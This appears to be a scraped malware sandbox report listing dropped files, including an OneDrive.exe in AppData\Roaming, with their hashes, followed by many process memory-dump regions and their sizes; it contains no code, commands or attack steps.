Filesize
7KB

MD5
28ff6d155581c169e25af9199d483f1a

SHA1
befef7c7f5cdc3823e5e5790034e4654cbf7f203

SHA256
5511d6e9ebf3a93412bb8aad521c7b6d21715d17ee36b719d946338cd973f026

SHA512
9e3acbda5fab0ff6e86fd0a7259d912b294b69cf3c44796a1d8dca42cfeae953cfb1ff59d60522359e5a7765d4aca05744ba824cb790efd67234a353f4dcda5a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
28ff6d155581c169e25af9199d483f1a

SHA1
befef7c7f5cdc3823e5e5790034e4654cbf7f203

SHA256
5511d6e9ebf3a93412bb8aad521c7b6d21715d17ee36b719d946338cd973f026

SHA512
9e3acbda5fab0ff6e86fd0a7259d912b294b69cf3c44796a1d8dca42cfeae953cfb1ff59d60522359e5a7765d4aca05744ba824cb790efd67234a353f4dcda5a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
28ff6d155581c169e25af9199d483f1a

SHA1
befef7c7f5cdc3823e5e5790034e4654cbf7f203

SHA256
5511d6e9ebf3a93412bb8aad521c7b6d21715d17ee36b719d946338cd973f026

SHA512
9e3acbda5fab0ff6e86fd0a7259d912b294b69cf3c44796a1d8dca42cfeae953cfb1ff59d60522359e5a7765d4aca05744ba824cb790efd67234a353f4dcda5a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
28ff6d155581c169e25af9199d483f1a

SHA1
befef7c7f5cdc3823e5e5790034e4654cbf7f203

SHA256
5511d6e9ebf3a93412bb8aad521c7b6d21715d17ee36b719d946338cd973f026

SHA512
9e3acbda5fab0ff6e86fd0a7259d912b294b69cf3c44796a1d8dca42cfeae953cfb1ff59d60522359e5a7765d4aca05744ba824cb790efd67234a353f4dcda5a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
28ff6d155581c169e25af9199d483f1a

SHA1
befef7c7f5cdc3823e5e5790034e4654cbf7f203

SHA256
5511d6e9ebf3a93412bb8aad521c7b6d21715d17ee36b719d946338cd973f026

SHA512
9e3acbda5fab0ff6e86fd0a7259d912b294b69cf3c44796a1d8dca42cfeae953cfb1ff59d60522359e5a7765d4aca05744ba824cb790efd67234a353f4dcda5a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
28ff6d155581c169e25af9199d483f1a

SHA1
befef7c7f5cdc3823e5e5790034e4654cbf7f203

SHA256
5511d6e9ebf3a93412bb8aad521c7b6d21715d17ee36b719d946338cd973f026

SHA512
9e3acbda5fab0ff6e86fd0a7259d912b294b69cf3c44796a1d8dca42cfeae953cfb1ff59d60522359e5a7765d4aca05744ba824cb790efd67234a353f4dcda5a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
28ff6d155581c169e25af9199d483f1a

SHA1
befef7c7f5cdc3823e5e5790034e4654cbf7f203

SHA256
5511d6e9ebf3a93412bb8aad521c7b6d21715d17ee36b719d946338cd973f026

SHA512
9e3acbda5fab0ff6e86fd0a7259d912b294b69cf3c44796a1d8dca42cfeae953cfb1ff59d60522359e5a7765d4aca05744ba824cb790efd67234a353f4dcda5a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9A2FFPH8S8UEW6KXJPK3.temp

Filesize
7KB

MD5
28ff6d155581c169e25af9199d483f1a

SHA1
befef7c7f5cdc3823e5e5790034e4654cbf7f203

SHA256
5511d6e9ebf3a93412bb8aad521c7b6d21715d17ee36b719d946338cd973f026

SHA512
9e3acbda5fab0ff6e86fd0a7259d912b294b69cf3c44796a1d8dca42cfeae953cfb1ff59d60522359e5a7765d4aca05744ba824cb790efd67234a353f4dcda5a

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive.exe

Filesize
8.6MB

MD5
546bd4f906d07e78c3167428c09ecb4f

SHA1
f3ed2616a9630f83922e1b4a07bc8251e23530c4

SHA256
06e2a779b34fbd168fb85d4ee1331967a87187fa810bd3739f96bb9222869ad4

SHA512
066b3348b02a20d9dcffeadb322d3e9d726b59d1a93101adebc23edb008108782cf699846d7d874c17f45fdf60c17a021b21b77264022a0f2bc943b02575cd82

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive.exe

Filesize
8.6MB

MD5
546bd4f906d07e78c3167428c09ecb4f

SHA1
f3ed2616a9630f83922e1b4a07bc8251e23530c4

SHA256
06e2a779b34fbd168fb85d4ee1331967a87187fa810bd3739f96bb9222869ad4

SHA512
066b3348b02a20d9dcffeadb322d3e9d726b59d1a93101adebc23edb008108782cf699846d7d874c17f45fdf60c17a021b21b77264022a0f2bc943b02575cd82

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

Filesize
8.6MB

MD5
546bd4f906d07e78c3167428c09ecb4f

SHA1
f3ed2616a9630f83922e1b4a07bc8251e23530c4

SHA256
06e2a779b34fbd168fb85d4ee1331967a87187fa810bd3739f96bb9222869ad4

SHA512
066b3348b02a20d9dcffeadb322d3e9d726b59d1a93101adebc23edb008108782cf699846d7d874c17f45fdf60c17a021b21b77264022a0f2bc943b02575cd82

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

Filesize
8.6MB

MD5
546bd4f906d07e78c3167428c09ecb4f

SHA1
f3ed2616a9630f83922e1b4a07bc8251e23530c4

SHA256
06e2a779b34fbd168fb85d4ee1331967a87187fa810bd3739f96bb9222869ad4

SHA512
066b3348b02a20d9dcffeadb322d3e9d726b59d1a93101adebc23edb008108782cf699846d7d874c17f45fdf60c17a021b21b77264022a0f2bc943b02575cd82

Download Submit
\Users\Admin\AppData\Roaming\OneDrive.exe

Filesize
8.6MB

MD5
546bd4f906d07e78c3167428c09ecb4f

SHA1
f3ed2616a9630f83922e1b4a07bc8251e23530c4

SHA256
06e2a779b34fbd168fb85d4ee1331967a87187fa810bd3739f96bb9222869ad4

SHA512
066b3348b02a20d9dcffeadb322d3e9d726b59d1a93101adebc23edb008108782cf699846d7d874c17f45fdf60c17a021b21b77264022a0f2bc943b02575cd82

Download Submit
\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

Filesize
8.6MB

MD5
546bd4f906d07e78c3167428c09ecb4f

SHA1
f3ed2616a9630f83922e1b4a07bc8251e23530c4

SHA256
06e2a779b34fbd168fb85d4ee1331967a87187fa810bd3739f96bb9222869ad4

SHA512
066b3348b02a20d9dcffeadb322d3e9d726b59d1a93101adebc23edb008108782cf699846d7d874c17f45fdf60c17a021b21b77264022a0f2bc943b02575cd82

Download Submit
memory/240-81-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/240-86-0x00000000026A0000-0x00000000026AE000-memory.dmp

Filesize
56KB

Download
memory/284-265-0x0000000000A50000-0x0000000000A77000-memory.dmp

Filesize
156KB

Download
memory/284-272-0x0000000037B20000-0x0000000037B30000-memory.dmp

Filesize
64KB

Download
memory/420-318-0x0000000000980000-0x00000000009A7000-memory.dmp

Filesize
156KB

Download
memory/420-119-0x0000000000890000-0x00000000008B7000-memory.dmp

Filesize
156KB

Download
memory/420-117-0x00000000007C0000-0x00000000007E1000-memory.dmp

Filesize
132KB

Download
memory/420-116-0x00000000007C0000-0x00000000007E1000-memory.dmp

Filesize
132KB

Download
memory/420-120-0x000007FEBE8B0000-0x000007FEBE8C0000-memory.dmp

Filesize
64KB

Download
memory/420-121-0x0000000037B20000-0x0000000037B30000-memory.dmp

Filesize
64KB

Download
memory/420-145-0x0000000000890000-0x00000000008B7000-memory.dmp

Filesize
156KB

Download
memory/464-125-0x000007FEBE8B0000-0x000007FEBE8C0000-memory.dmp

Filesize
64KB

Download
memory/464-146-0x0000000000150000-0x0000000000177000-memory.dmp

Filesize
156KB

Download
memory/464-124-0x0000000000150000-0x0000000000177000-memory.dmp

Filesize
156KB

Download
memory/464-321-0x0000000000A50000-0x0000000000A77000-memory.dmp

Filesize
156KB

Download
memory/464-126-0x0000000037B20000-0x0000000037B30000-memory.dmp

Filesize
64KB

Download
memory/480-147-0x00000000000A0000-0x00000000000C7000-memory.dmp

Filesize
156KB

Download
memory/480-130-0x00000000000A0000-0x00000000000C7000-memory.dmp

Filesize
156KB

Download
memory/480-323-0x0000000000B10000-0x0000000000B37000-memory.dmp

Filesize
156KB

Download
memory/480-132-0x0000000037B20000-0x0000000037B30000-memory.dmp

Filesize
64KB

Download
memory/480-131-0x000007FEBE8B0000-0x000007FEBE8C0000-memory.dmp

Filesize
64KB

Download
memory/484-286-0x0000000001D20000-0x0000000001D47000-memory.dmp

Filesize
156KB

Download
memory/484-290-0x0000000037B20000-0x0000000037B30000-memory.dmp

Filesize
64KB

Download
memory/488-138-0x000007FEBE8B0000-0x000007FEBE8C0000-memory.dmp

Filesize
64KB

Download
memory/488-148-0x00000000002C0000-0x00000000002E7000-memory.dmp

Filesize
156KB

Download
memory/488-139-0x0000000037B20000-0x0000000037B30000-memory.dmp

Filesize
64KB

Download
memory/488-137-0x00000000002C0000-0x00000000002E7000-memory.dmp

Filesize
156KB

Download
memory/604-173-0x000007FEBE8B0000-0x000007FEBE8C0000-memory.dmp

Filesize
64KB

Download
memory/604-175-0x0000000037B20000-0x0000000037B30000-memory.dmp

Filesize
64KB

Download
memory/604-170-0x0000000000190000-0x00000000001B7000-memory.dmp

Filesize
156KB

Download
memory/604-178-0x0000000000190000-0x00000000001B7000-memory.dmp

Filesize
156KB

Download
memory/676-88-0x00000000027D0000-0x0000000002850000-memory.dmp

Filesize
512KB

Download
memory/676-89-0x00000000027D0000-0x0000000002850000-memory.dmp

Filesize
512KB

Download
memory/676-71-0x000000001B100000-0x000000001B3E2000-memory.dmp

Filesize
2.9MB

Download
memory/676-76-0x0000000002490000-0x0000000002498000-memory.dmp

Filesize
32KB

Download
memory/676-79-0x00000000027D0000-0x0000000002850000-memory.dmp

Filesize
512KB

Download
memory/676-87-0x000000001B9F0000-0x000000001BA00000-memory.dmp

Filesize
64KB

Download
memory/676-80-0x00000000027D0000-0x0000000002850000-memory.dmp

Filesize
512KB

Download
memory/680-182-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/680-176-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/680-180-0x000007FEBE8B0000-0x000007FEBE8C0000-memory.dmp

Filesize
64KB

Download
memory/680-183-0x0000000037B20000-0x0000000037B30000-memory.dmp

Filesize
64KB

Download
memory/764-192-0x0000000037B20000-0x0000000037B30000-memory.dmp

Filesize
64KB

Download
memory/764-186-0x00000000008B0000-0x00000000008D7000-memory.dmp

Filesize
156KB

Download
memory/764-189-0x000007FEBE8B0000-0x000007FEBE8C0000-memory.dmp

Filesize
64KB

Download
memory/776-82-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/776-90-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/776-96-0x000000013F660000-0x00000001405A1000-memory.dmp

Filesize
15.3MB

Download
memory/776-85-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/808-105-0x0000000001F90000-0x0000000002010000-memory.dmp

Filesize
512KB

Download
memory/808-106-0x0000000001F90000-0x0000000002010000-memory.dmp

Filesize
512KB

Download
memory/808-104-0x0000000001F90000-0x0000000002010000-memory.dmp

Filesize
512KB

Download
memory/816-191-0x00000000008A0000-0x00000000008C7000-memory.dmp

Filesize
156KB

Download
memory/816-194-0x000007FEBE8B0000-0x000007FEBE8C0000-memory.dmp

Filesize
64KB

Download
memory/816-199-0x0000000037B20000-0x0000000037B30000-memory.dmp

Filesize
64KB

Download
memory/816-257-0x00000000008A0000-0x00000000008C7000-memory.dmp

Filesize
156KB

Download
memory/860-202-0x0000000037B20000-0x0000000037B30000-memory.dmp

Filesize
64KB

Download
memory/860-195-0x00000000007E0000-0x0000000000807000-memory.dmp

Filesize
156KB

Download
memory/860-198-0x000007FEBE8B0000-0x000007FEBE8C0000-memory.dmp

Filesize
64KB

Download
memory/860-258-0x00000000007E0000-0x0000000000807000-memory.dmp

Filesize
156KB

Download
memory/968-260-0x0000000000180000-0x00000000001A7000-memory.dmp

Filesize
156KB

Download
memory/968-201-0x0000000000180000-0x00000000001A7000-memory.dmp

Filesize
156KB

Download
memory/968-205-0x000007FEBE8B0000-0x000007FEBE8C0000-memory.dmp

Filesize
64KB

Download
memory/968-262-0x0000000037B20000-0x0000000037B30000-memory.dmp

Filesize
64KB

Download
memory/968-316-0x00000000008E0000-0x0000000000907000-memory.dmp

Filesize
156KB

Download
memory/1040-288-0x00000000001B0000-0x00000000001D7000-memory.dmp

Filesize
156KB

Download
memory/1040-296-0x0000000037B20000-0x0000000037B30000-memory.dmp

Filesize
64KB

Download
memory/1096-54-0x0000000000960000-0x000000000097C000-memory.dmp

Filesize
112KB

Download
memory/1096-55-0x0000000000250000-0x0000000000266000-memory.dmp

Filesize
88KB

Download
memory/1116-298-0x0000000001E90000-0x0000000001EB7000-memory.dmp

Filesize
156KB

Download
memory/1116-300-0x0000000037B20000-0x0000000037B30000-memory.dmp

Filesize
64KB

Download
memory/1148-97-0x000000013F660000-0x00000001405A1000-memory.dmp

Filesize
15.3MB

Download
memory/1148-151-0x000000013F660000-0x00000001405A1000-memory.dmp

Filesize
15.3MB

Download
memory/1172-167-0x000000000265B000-0x0000000002692000-memory.dmp

Filesize
220KB

Download
memory/1172-165-0x00000000022D0000-0x00000000022D8000-memory.dmp

Filesize
32KB

Download
memory/1172-162-0x000000001B100000-0x000000001B3E2000-memory.dmp

Filesize
2.9MB

Download
memory/1172-164-0x0000000002650000-0x00000000026D0000-memory.dmp

Filesize
512KB

Download
memory/1172-166-0x0000000002654000-0x0000000002657000-memory.dmp

Filesize
12KB

Download
memory/1172-163-0x0000000002650000-0x00000000026D0000-memory.dmp

Filesize
512KB

Download
memory/1208-303-0x0000000000150000-0x0000000000177000-memory.dmp

Filesize
156KB

Download
memory/1248-307-0x0000000003AA0000-0x0000000003AC7000-memory.dmp

Filesize
156KB

Download
memory/1248-313-0x0000000037B20000-0x0000000037B30000-memory.dmp

Filesize
64KB

Download
memory/1472-143-0x0000000002250000-0x00000000022D0000-memory.dmp

Filesize
512KB

Download
memory/1472-142-0x0000000002250000-0x00000000022D0000-memory.dmp

Filesize
512KB

Download
memory/1472-141-0x0000000002250000-0x00000000022D0000-memory.dmp

Filesize
512KB

Download
memory/1472-144-0x0000000002250000-0x00000000022D0000-memory.dmp

Filesize
512KB

Download
memory/1760-108-0x0000000077AE0000-0x0000000077C89000-memory.dmp

Filesize
1.7MB

Download
memory/1760-172-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1760-83-0x0000000002670000-0x00000000026F0000-memory.dmp

Filesize
512KB

Download
memory/1760-77-0x0000000002670000-0x00000000026F0000-memory.dmp

Filesize
512KB

Download
memory/1760-84-0x000000000267B000-0x00000000026B2000-memory.dmp

Filesize
220KB

Download
memory/1760-109-0x00000000778C0000-0x00000000779DF000-memory.dmp

Filesize
1.1MB

Download
memory/1760-78-0x0000000002670000-0x00000000026F0000-memory.dmp

Filesize
512KB

Download
memory/1784-304-0x00000000024CB000-0x0000000002502000-memory.dmp

Filesize
220KB

Download
memory/1784-308-0x00000000024C4000-0x00000000024C7000-memory.dmp

Filesize
12KB

Download
memory/1856-156-0x000000013FAE0000-0x0000000140A21000-memory.dmp

Filesize
15.3MB

Download
memory/1944-154-0x000000013FAE0000-0x0000000140A21000-memory.dmp

Filesize
15.3MB

Download
memory/2016-310-0x00000000003A0000-0x00000000003C7000-memory.dmp

Filesize
156KB

Download